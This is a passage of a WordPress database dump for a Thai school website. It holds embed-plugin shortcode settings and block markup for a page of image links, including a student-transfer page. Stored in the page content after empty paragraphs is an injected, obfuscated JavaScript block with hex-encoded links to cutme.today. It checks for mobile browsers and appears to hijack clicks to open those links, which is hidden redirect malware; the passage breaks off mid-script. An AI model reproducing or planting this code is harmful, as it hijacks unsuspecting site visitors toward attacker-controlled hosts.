embedpress_pro_soundcloud_comments=\'false\' embedpress_pro_soundcloud_artwork=\'false\' embedpress_pro_soundcloud_play_count=\'false\' embedpress_pro_soundcloud_user_name=\'false\' embedpress_pro_soundcloud_buy_button=\'false\' embedpress_pro_soundcloud_download_button=\'false\' embedpress_pro_dailymotion_ui_logo=\'false\' embedpress_pro_dailymotion_autoplay=\'false\' embedpress_pro_dailymotion_play_on_mobile=\'false\' embedpress_pro_dailymotion_mute=\'false\' embedpress_pro_dailymotion_player_control=\'false\' embedpress_pro_dailymotion_video_info=\'false\' embedpress_pro_dailymotion_control_color=\'false\' embedpress_pro_dailymotion_logo=\'false\' embedpress_pro_dailymotion_logo_size=\'false\' embedpress_pro_dailymotion_logo_custom_dimension=\'false\' embedpress_pro_dailymotion_logo_xpos=\'false\' embedpress_pro_dailymotion_logo_ypos=\'false\' embedpress_pro_dailymotion_logo_opacity=\'false\' embedpress_pro_dailymotion_logo_opacity_hover=\'false\' embedpress_pro_dailymotion_cta=\'false\' embedpress_pro_twitch_autoplay=\'false\' embedpress_pro_fs=\'false\' embedpress_pro_twitch_chat=\'false\' embedpress_pro_twitch_mute=\'false\' embedpress_pro_twitch_theme=\'false\' embedpress_pro_twitch_logo=\'false\' embedpress_pro_twitch_logo_size=\'false\' embedpress_pro_twitch_logo_custom_dimension=\'false\' embedpress_pro_twitch_logo_xpos=\'false\' embedpress_pro_twitch_logo_ypos=\'false\' embedpress_pro_twitch_logo_opacity=\'false\' embedpress_pro_twitch_logo_opacity_hover=\'false\' embedpress_pro_twitch_cta=\'false\' limit=\'false\' orderby=\'false\' ytChannelLayout=\'false\' pagesize=\'false\' columns=\'false\' gapbetweenvideos=\'false\' pagination=\'false\' yt_sub_channel=\'false\' yt_sub_text=\'false\' yt_sub_layout=\'false\' yt_sub_theme=\'false\' yt_sub_count=\'false\' yt_lc_show=\'false\' layout=\'false\' preset=\'false\' nftperrow=\'false\' gapbetweenitem=\'false\' collectionname=\'false\' nftimage=\'false\' nfttitle=\'false\' nftcreator=\'false\' nftprice=\'false\' nftlastsale=\'false\' nftbutton=\'false\' loadmore=\'false\' itemperpage=\'false\' nftrank=\'false\' nftdetails=\'false\' instafeedProfileImage=\'false\' instafeedProfileImageUrl=\'false\' instafeedFollowBtn=\'false\' instafeedPostsCount=\'false\' instafeedFollowersCount=\'false\' instafeedAccName=\'false\' instaLayout=\'false\' instafeedColumns=\'false\' instafeedColumnsGap=\'false\' embedpress_instafeed_slide_show=\'false\' embedpress_carousel_autoplay=\'false\' embedpress_carousel_autoplay_speed=\'false\' embedpress_carousel_transition_speed=\'false\' embedpress_carousel_loop=\'false\' embedpress_carousel_arrows=\'false\' embedpress_carousel_spacing=\'false\' instafeedPostsPerPage=\'false\' instafeedTab=\'false\' instafeedLikesCount=\'false\' instafeedCommentsCount=\'false\' instafeedPopup=\'false\' instafeedPopupFollowBtn=\'false\' instafeedLoadmore=\'false\' cEmbedType=\'false\' cPopupButtonTextColor=\'false\' cPopupButtonBGColor=\'false\' calendlyData=\'false\' hideCookieBanner=\'false\' hideEventTypeDetails=\'false\' cBackgroundColor=\'false\' cTextColor=\'false\' cButtonLinkColor=\'false\' theme=\'false\' color=\'false\' coverImageUrl=\'false\' hideDownload=\'false\' playlist=\'false\' playlistContinuous=\'false\' playlistLoop=\'false\' playlistAutoupdate=\'false\' hidePlaylistDescriptions=\'false\' hidePlaylistImages=\'false\' episodeImagePosition=\'false\' showChaptersImage=\'false\' hideLikes=\'false\' hideComments=\'false\' hideSharing=\'false\' hideLogo=\'false\' hideEpisodeDescription=\'false\' mode=\'false\' playerAutoplay=\'false\' delay=\'false\' repeat=\'false\' backgroundColor=\'false\' expiration=\'false\' adManager=\'false\' adSource=\'false\' adFileUrl=\'false\' adFileUrl1=\'false\' adXPosition=\'false\' adYPosition=\'false\' adUrl=\'false\' adSkipButton=\'false\' embedpress_lock_content=\'false\' embedpress_protection_type=\'false\' embedpress_select_roles=\'false\' embedpress_lock_content_password=\'false\' embedpress_enable_footer_message=\'false\' embedpress_content_share=\'false\' embedpress_content_share_position=\'false\' embedpress_content_title=\'false\' embedpress_content_descripiton=\'false\' embedpress_content_share_custom_thumbnail=\'false\' embedpress_share_facebook=\'false\' embedpress_share_twitter=\'false\' embedpress_share_pinterest=\'false\' embedpress_share_linkedin=\'false\' align_tablet=\'false\' align_mobile=\'false\' nft_item_background_color=\'false\' nft_collectionname_color=\'false\' nft_collectionname_hover_color=\'false\' nft_collectionname_typography_typography=\'false\' nft_collectionname_typography_font_family=\'false\' nft_collectionname_typography_font_size=\'false\' nft_collectionname_typography_font_weight=\'false\' nft_collectionname_typography_text_transform=\'false\' nft_collectionname_typography_font_style=\'false\' nft_collectionname_typography_text_decoration=\'false\' nft_collectionname_typography_line_height=\'false\' nft_collectionname_typography_letter_spacing=\'false\' nft_collectionname_typography_word_spacing=\'false\' nft_title_color=\'false\' nft_title_typography_typography=\'false\' nft_title_typography_font_family=\'false\' nft_title_typography_font_size=\'false\' nft_title_typography_font_weight=\'false\' nft_title_typography_text_transform=\'false\' nft_title_typography_font_style=\'false\' nft_title_typography_text_decoration=\'false\' nft_title_typography_line_height=\'false\' nft_title_typography_letter_spacing=\'false\' nft_title_typography_word_spacing=\'false\' nft_creator_color=\'false\' nft_creator_typography_typography=\'false\' nft_creator_typography_font_family=\'false\' nft_creator_typography_font_size=\'false\' nft_creator_typography_font_weight=\'false\' nft_creator_typography_text_transform=\'false\' nft_creator_typography_font_style=\'false\' nft_creator_typography_text_decoration=\'false\' nft_creator_typography_line_height=\'false\' nft_creator_typography_letter_spacing=\'false\' nft_creator_typography_word_spacing=\'false\' nft_created_by_color=\'false\' nft_created_by_typography_typography=\'false\' nft_created_by_typography_font_family=\'false\' nft_created_by_typography_font_size=\'false\' nft_created_by_typography_font_weight=\'false\' nft_created_by_typography_text_transform=\'false\' nft_created_by_typography_font_style=\'false\' nft_created_by_typography_text_decoration=\'false\' nft_created_by_typography_line_height=\'false\' nft_created_by_typography_letter_spacing=\'false\' nft_created_by_typography_word_spacing=\'false\' nft_price_color=\'false\' nft_price_typography_typography=\'false\' nft_price_typography_font_family=\'false\' nft_price_typography_font_size=\'false\' nft_price_typography_font_weight=\'false\' nft_price_typography_text_transform=\'false\' nft_price_typography_font_style=\'false\' nft_price_typography_text_decoration=\'false\' nft_price_typography_line_height=\'false\' nft_price_typography_letter_spacing=\'false\' nft_price_typography_word_spacing=\'false\' nft_last_sale_color=\'false\' nft_last_sale_typography_typography=\'false\' nft_last_sale_typography_font_family=\'false\' nft_last_sale_typography_font_size=\'false\' nft_last_sale_typography_font_weight=\'false\' nft_last_sale_typography_text_transform=\'false\' nft_last_sale_typography_font_style=\'false\' nft_last_sale_typography_text_decoration=\'false\' nft_last_sale_typography_line_height=\'false\' nft_last_sale_typography_letter_spacing=\'false\' nft_last_sale_typography_word_spacing=\'false\' nftbutton_color=\'false\' nftbutton_bg_color=\'false\' nftbutton_typography_typography=\'false\' nftbutton_typography_font_family=\'false\' nftbutton_typography_font_size=\'false\' nftbutton_typography_font_weight=\'false\' nftbutton_typography_text_transform=\'false\' nftbutton_typography_font_style=\'false\' nftbutton_typography_text_decoration=\'false\' nftbutton_typography_line_height=\'false\' nftbutton_typography_letter_spacing=\'false\' nftbutton_typography_word_spacing=\'false\' nft_loadmore_color=\'false\' nft_loadmore_typography_typography=\'false\' nft_loadmore_typography_font_family=\'false\' nft_loadmore_typography_font_size=\'false\' nft_loadmore_typography_font_weight=\'false\' nft_loadmore_typography_text_transform=\'false\' nft_loadmore_typography_font_style=\'false\' nft_loadmore_typography_text_decoration=\'false\' nft_loadmore_typography_line_height=\'false\' nft_loadmore_typography_letter_spacing=\'false\' nft_loadmore_typography_word_spacing=\'false\' nft_loadmore_bgcolor=\'false\' nftrank_label_color=\'false\' nftrank_label_typography_typography=\'false\' nftrank_label_typography_font_family=\'false\' nftrank_label_typography_font_size=\'false\' nftrank_label_typography_font_weight=\'false\' nftrank_label_typography_text_transform=\'false\' nftrank_label_typography_font_style=\'false\' nftrank_label_typography_text_decoration=\'false\' nftrank_label_typography_line_height=\'false\' nftrank_label_typography_letter_spacing=\'false\' nftrank_label_typography_word_spacing=\'false\' nftrank_color=\'false\' nftrank_border_color=\'false\' nftrank_typography_typography=\'false\' nftrank_typography_font_family=\'false\' nftrank_typography_font_size=\'false\' nftrank_typography_font_weight=\'false\' nftrank_typography_text_transform=\'false\' nftrank_typography_font_style=\'false\' nftrank_typography_text_decoration=\'false\' nftrank_typography_line_height=\'false\' nftrank_typography_letter_spacing=\'false\' nftrank_typography_word_spacing=\'false\' nftdetail_title_color=\'false\' nftdetail_title_typography_typography=\'false\' nftdetail_title_typography_font_family=\'false\' nftdetail_title_typography_font_size=\'false\' nftdetail_title_typography_font_weight=\'false\' nftdetail_title_typography_text_transform=\'false\' nftdetail_title_typography_font_style=\'false\' nftdetail_title_typography_text_decoration=\'false\' nftdetail_title_typography_line_height=\'false\' nftdetail_title_typography_letter_spacing=\'false\' nftdetail_title_typography_word_spacing=\'false\' nftdetail_color=\'false\' nftdetail_typography_typography=\'false\' nftdetail_typography_font_family=\'false\' nftdetail_typography_font_size=\'false\' nftdetail_typography_font_weight=\'false\' nftdetail_typography_text_transform=\'false\' nftdetail_typography_font_style=\'false\' nftdetail_typography_text_decoration=\'false\' nftdetail_typography_line_height=\'false\' nftdetail_typography_letter_spacing=\'false\' nftdetail_typography_word_spacing=\'false\' nftdetail_link_color=\'false\' nftdetail_link_typography_typography=\'false\' nftdetail_link_typography_font_family=\'false\' nftdetail_link_typography_font_size=\'false\' nftdetail_link_typography_font_weight=\'false\' nftdetail_link_typography_text_transform=\'false\' nftdetail_link_typography_font_style=\'false\' nftdetail_link_typography_text_decoration=\'false\' nftdetail_link_typography_line_height=\'false\' nftdetail_link_typography_letter_spacing=\'false\' nftdetail_link_typography_word_spacing=\'false\' _title=\'false\' _element_width_tablet=\'false\' _element_width_mobile=\'false\' _grid_column=\'false\' _grid_column_custom=\'false\' _grid_row=\'false\' _grid_row_custom=\'false\' _flex_align_self=\'false\' _flex_order=\'false\' _flex_order_custom=\'false\' _flex_size=\'false\' _flex_grow=\'false\' _flex_shrink=\'false\' _element_vertical_align=\'false\' _position=\'false\' _offset_orientation_h=\'false\' _offset_x=\'false\' _offset_x_end=\'false\' _offset_orientation_v=\'false\' _offset_y=\'false\' _offset_y_end=\'false\' _z_index=\'false\' _element_id=\'false\' _css_classes=\'false\' _element_cache=\'false\' _animation=\'false\' _animation_tablet=\'false\' _animation_mobile=\'false\' animation_duration=\'false\' _animation_delay=\'false\' _transform_rotate_popover=\'false\' _transform_rotateZ_effect=\'false\' _transform_rotateZ_effect_tablet=\'false\' _transform_rotateZ_effect_mobile=\'false\' _transform_rotate_3d=\'false\' _transform_rotateX_effect=\'false\' _transform_rotateX_effect_tablet=\'false\' _transform_rotateX_effect_mobile=\'false\' _transform_rotateY_effect=\'false\' _transform_rotateY_effect_tablet=\'false\' _transform_rotateY_effect_mobile=\'false\' _transform_perspective_effect=\'false\' _transform_perspective_effect_tablet=\'false\' _transform_perspective_effect_mobile=\'false\' _transform_translate_popover=\'false\' _transform_translateX_effect=\'false\' _transform_translateX_effect_tablet=\'false\' _transform_translateX_effect_mobile=\'false\' _transform_translateY_effect=\'false\' _transform_translateY_effect_tablet=\'false\' _transform_translateY_effect_mobile=\'false\' _transform_scale_popover=\'false\' _transform_keep_proportions=\'yes\' _transform_scale_effect=\'false\' _transform_scale_effect_tablet=\'false\' _transform_scale_effect_mobile=\'false\' _transform_scaleX_effect=\'false\' _transform_scaleX_effect_tablet=\'false\' _transform_scaleX_effect_mobile=\'false\' _transform_scaleY_effect=\'false\' _transform_scaleY_effect_tablet=\'false\' _transform_scaleY_effect_mobile=\'false\' _transform_skew_popover=\'false\' _transform_skewX_effect=\'false\' _transform_skewX_effect_tablet=\'false\' _transform_skewX_effect_mobile=\'false\' _transform_skewY_effect=\'false\' _transform_skewY_effect_tablet=\'false\' _transform_skewY_effect_mobile=\'false\' _transform_flipX_effect=\'false\' _transform_flipY_effect=\'false\' _transform_rotate_popover_hover=\'false\' _transform_rotateZ_effect_hover=\'false\' _transform_rotateZ_effect_hover_tablet=\'false\' _transform_rotateZ_effect_hover_mobile=\'false\' _transform_rotate_3d_hover=\'false\' _transform_rotateX_effect_hover=\'false\' _transform_rotateX_effect_hover_tablet=\'false\' _transform_rotateX_effect_hover_mobile=\'false\' _transform_rotateY_effect_hover=\'false\' _transform_rotateY_effect_hover_tablet=\'false\' _transform_rotateY_effect_hover_mobile=\'false\' _transform_perspective_effect_hover=\'false\' _transform_perspective_effect_hover_tablet=\'false\' _transform_perspective_effect_hover_mobile=\'false\' _transform_translate_popover_hover=\'false\' _transform_translateX_effect_hover=\'false\' _transform_translateX_effect_hover_tablet=\'false\' _transform_translateX_effect_hover_mobile=\'false\' _transform_translateY_effect_hover=\'false\' _transform_translateY_effect_hover_tablet=\'false\' _transform_translateY_effect_hover_mobile=\'false\' _transform_scale_popover_hover=\'false\' _transform_keep_proportions_hover=\'yes\' _transform_scale_effect_hover=\'false\' _transform_scale_effect_hover_tablet=\'false\' _transform_scale_effect_hover_mobile=\'false\' _transform_scaleX_effect_hover=\'false\' _transform_scaleX_effect_hover_tablet=\'false\' _transform_scaleX_effect_hover_mobile=\'false\' _transform_scaleY_effect_hover=\'false\' _transform_scaleY_effect_hover_tablet=\'false\' _transform_scaleY_effect_hover_mobile=\'false\' _transform_skew_popover_hover=\'false\' _transform_skewX_effect_hover=\'false\' _transform_skewX_effect_hover_tablet=\'false\' _transform_skewX_effect_hover_mobile=\'false\' _transform_skewY_effect_hover=\'false\' _transform_skewY_effect_hover_tablet=\'false\' _transform_skewY_effect_hover_mobile=\'false\' _transform_flipX_effect_hover=\'false\' _transform_flipY_effect_hover=\'false\' motion_fx_transform_x_anchor_point=\'false\' motion_fx_transform_y_anchor_point=\'false\' _background_background=\'false\' _background_color=\'false\' _background_color_stop=\'false\' _background_color_b=\'false\' _background_color_b_stop=\'false\' _background_gradient_type=\'false\' _background_gradient_angle=\'false\' _background_gradient_position=\'false\' _background_image=\'false\' _background_position=\'false\' _background_xpos=\'false\' _background_ypos=\'false\' _background_attachment=\'false\' _background_repeat=\'false\' _background_size=\'false\' _background_bg_width=\'false\' _background_video_link=\'false\' _background_video_start=\'false\' _background_video_end=\'false\' _background_play_once=\'false\' _background_play_on_mobile=\'false\' _background_privacy_mode=\'false\' _background_video_fallback=\'false\' _background_slideshow_gallery=\'false\' _background_slideshow_loop=\'false\' _background_slideshow_slide_duration=\'false\' _background_slideshow_slide_transition=\'false\' _background_slideshow_transition_duration=\'false\' _background_slideshow_background_size=\'false\' _background_slideshow_background_position=\'false\' _background_slideshow_lazyload=\'false\' _background_slideshow_ken_burns=\'false\' _background_slideshow_ken_burns_zoom_direction=\'false\' _background_hover_background=\'false\' _background_hover_color=\'false\' _background_hover_color_stop=\'false\' _background_hover_color_b=\'false\' _background_hover_color_b_stop=\'false\' _background_hover_gradient_type=\'false\' _background_hover_gradient_angle=\'false\' _background_hover_gradient_position=\'false\' _background_hover_image=\'false\' _background_hover_position=\'false\' _background_hover_xpos=\'false\' _background_hover_ypos=\'false\' _background_hover_attachment=\'false\' _background_hover_repeat=\'false\' _background_hover_size=\'false\' _background_hover_bg_width=\'false\' _background_hover_video_link=\'false\' _background_hover_video_start=\'false\' _background_hover_video_end=\'false\' _background_hover_play_once=\'false\' _background_hover_play_on_mobile=\'false\' _background_hover_privacy_mode=\'false\' _background_hover_video_fallback=\'false\' _background_hover_slideshow_gallery=\'false\' _background_hover_slideshow_loop=\'false\' _background_hover_slideshow_slide_duration=\'false\' _background_hover_slideshow_slide_transition=\'false\' _background_hover_slideshow_transition_duration=\'false\' _background_hover_slideshow_background_size=\'false\' _background_hover_slideshow_background_position=\'false\' _background_hover_slideshow_lazyload=\'false\' _background_hover_slideshow_ken_burns=\'false\' _background_hover_slideshow_ken_burns_zoom_direction=\'false\' _border_border=\'false\' _border_width=\'false\' _border_color=\'false\' _box_shadow_box_shadow_type=\'false\' _box_shadow_box_shadow=\'false\' _box_shadow_box_shadow_position=\'false\' _border_hover_border=\'false\' _border_hover_width=\'false\' _border_hover_color=\'false\' _box_shadow_hover_box_shadow_type=\'false\' _box_shadow_hover_box_shadow=\'false\' _box_shadow_hover_box_shadow_position=\'false\' _mask_switch=\'false\' _mask_shape=\'false\' _mask_image=\'false\' _mask_notice=\'false\' _mask_size=\'false\' _mask_size_scale=\'false\' _mask_position=\'false\' _mask_position_x=\'false\' _mask_position_y=\'false\' _mask_repeat=\'false\' hide_desktop=\'false\' hide_tablet=\'false\' hide_mobile=\'false\']https://www.canva.com/design/DAGsEine2O0/Q6Wb_uxvDbumPForlKtMkQ/view[/embedpress]','ยื่นเรื่องย้ายนักเรียน','','inherit','closed','closed','','1623-revision-v1','','','2025-07-03 09:44:53','2025-07-03 02:44:53','',1623,'http://pakhaeng.ssk.in.th/?p=1634',0,'revision','',0),
(1635,1,'2025-07-03 09:46:35','2025-07-03 02:46:35','<!-- wp:image {\"id\":1620,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/Is-It-a-Gift-Instagram-Post-1024x256.png\" alt=\"\" class=\"wp-image-1620\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":736,\"width\":\"200px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\",\"className\":\"is-style-default\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized is-style-default\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1623\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ย้าย-1.png\" alt=\"\" class=\"wp-image-736\" style=\"aspect-ratio:1;object-fit:cover;width:200px\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1608,\"width\":\"200px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\",\"className\":\"is-style-default\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized is-style-default\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=563\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/comment.png\" alt=\"\" class=\"wp-image-1608\" style=\"aspect-ratio:1;object-fit:cover;width:200px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":738,\"width\":\"200px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=741\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ดูเกรด-1.png\" alt=\"\" class=\"wp-image-738\" style=\"aspect-ratio:1;object-fit:cover;width:200px\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1606,\"width\":\"200px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/6.png\" alt=\"\" class=\"wp-image-1606\" style=\"aspect-ratio:1;object-fit:cover;width:200px\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":739,\"width\":\"200px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ห้องประชุม-1.png\" alt=\"\" class=\"wp-image-739\" style=\"aspect-ratio:1;object-fit:cover;width:200px\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1614,\"width\":\"200px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1611\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/5-2.png\" alt=\"\" class=\"wp-image-1614\" style=\"aspect-ratio:1;object-fit:cover;width:200px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const 